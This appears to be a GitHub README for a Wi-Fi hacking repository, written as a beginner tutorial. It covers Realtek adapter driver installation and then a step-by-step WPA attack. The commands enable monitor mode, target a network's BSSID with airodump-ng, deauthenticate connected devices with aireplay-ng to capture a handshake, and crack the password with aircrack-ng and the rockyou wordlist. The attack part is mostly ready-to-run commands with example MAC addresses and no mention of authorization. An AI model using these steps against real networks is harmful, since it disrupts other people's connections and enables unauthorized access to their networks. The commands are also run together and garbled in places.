git clone https://github.com/Krishnazzz/Wifi_hacking.git && cd Wifi_hacking && chmod +x install.sh && ./install.shDownload Driver tar file from above on your system Go to you download dir where it is install
cd Downloadsextract it manual or use :
tar -xjvf compat-wireless-2010-06-28.tar.bz2 go inside the dir of compact-wireless
cd compat-wireless-2010-06-28/Run both the commands :
sudo make unload sudo make load init 6type to check wlan0 or wlan1 interface showing or not
iwconfigIn my case im using TP-LINK Archer T2U Plus AC600
This adapter has a Realtek RTL8821AU Chipset . It will cost u βΉ1,100 or maybe less . it have a good range and It support in linux community and has driver for Kali linux , Parrot OS .etc Archer T2U Plus is on sale under 1000 INR , which is a very affordable price and it too good in my opinion for Beginners in Pentesting.
πAmazon
πFlipkart
πAC1300 T3U
- Update the package information :
sudo apt update -y - Install dkms and git :
sudo apt install dkms git- Install Build Dependencies :
sudo apt install build-essential libelf-dev linux-headers-$(uname -r)- Download the Driver files using git :
git clone https://github.com/aircrack-ng/rtl8812au.git- Navigate to the Downloaded directory :
cd rtl88*- Install the Driver
sudo make dkms_install- Check the wireless interfaces by typing :
lsusbiwconfig- Check the module name and version using the command sudo dkms status.
$ dkms status
8812au, 5.6.4.2_35491.20191025, 5.10.63+, armv6l: installed
rtl8188fu, 1.0, 5.10.63+, armv6l: installed.- here module name is 8812au and module version is 5.6.4.2_35491.20191025.
- use
sudo dkms remove <module>/<module-version>.$ sudo dkms remove 8812au/5.6.4.2_35491.20191025 --all
Deleting module version: 5.6.4.2_35491.20191025 completely from the DKMS tree.
Done. - delete this file using sudo rm -rf /var/lib/dkms/8812au/.
First you need adapter who's support Monitor mode && packet injection if u using this TP-link T2U plus. So ur ready
sudo sudo
su rootiwconfigairmon-ng check kill- wlan0 => interface name .
- WIFI@REALTEK => Is wlan0 nickname u can use both but reccommended wlan0.
- if u have already connected to wifi sometime it show wlan1 or wlan2 rather than wlna0 (in case u have 2 adpater 1 for wifi and second to attack)
ifconfig wlan0 downiwconfig wlan0 mode managed ifconfig wlan0 upiwconfig airmon-ng start wlan0 airodump-ng wlan0 - Copy bssid ofnetwork u like (bssid = mac address show on first row)
- also note the ch (channel number of same router)
-
--bssid => whom u going to attack
-
--channel => to give channel number if it or use [(-c) for channel but sometime it didn't work well ]
-
--write => to creat a file where my handshake store
airodump-ng wlan0 --bssid --channel --write /path/Meow.txtairodump-ng wlan0 --bssid -c -w /path/Meow.txtairodump-ng wlan0 --bssid 3C:46:45:1D:5D:31 --channel 11 -w /home/death/Meow.txt- aireplay-ng is powerfull we using itfor deauth people and capture handshake when they try to reconnect.
- -a => router mac addrs.
- -c => device connected with router we going to deauthenticate.
- --deauth / -0 => to send number of deauth packeges.
aireplay-ng wlan0 -a -c --deauth 10aireplay-ng wlan0 -a <bssid> -c <station> -0 <number of packages>aireplay-ng wlan0 -a 3C:46:45:1D:5D:31 -c D4:36:89:A4:7R:29 --deauth 10aireplay-ng wlan0 -a <bssid> -0 <deauth n.o packages>- .cap is the file fo capture handshake . In my case is Meow.txt.cap
- so we going to crack it by aircrack-ng with wordlists.
- -w to give wordlist.
- u got so many file but we need .cap file where handshake stored.
- if it not deauth another device.
- gzip -d /usr/share/wordlist/rockyou.txt (if it not)
aircrack-ng Meow.txt.cap -w /usr/share/rockyou.txt- when it will crack it shou the password.
- install wlan0
- Kali , parrot ubuntu install Wi-fi drivers.
- enable Monitor mode.
- Scan localarea wifi networks.
- deauth devices.
- capture handshake file.
- crack handshake ushing aircrack
π©βπ» I'm currently student
π§ I'm currently learning more C.E.H
π―ββοΈ to be honest i take help of @Esther7171 credit to him as well.
π€ i though to combine all so it easy for begginer bez at start i didn't find a proper tutorial.
π¬ Ask me about... "Nothing"
π« How to reach me... "@psychix_krishnaaa" instagram only please
β‘οΈ nothing much to write
@psychix_krishnaaa
my username
just for fun i use this on tested purpose hehehehe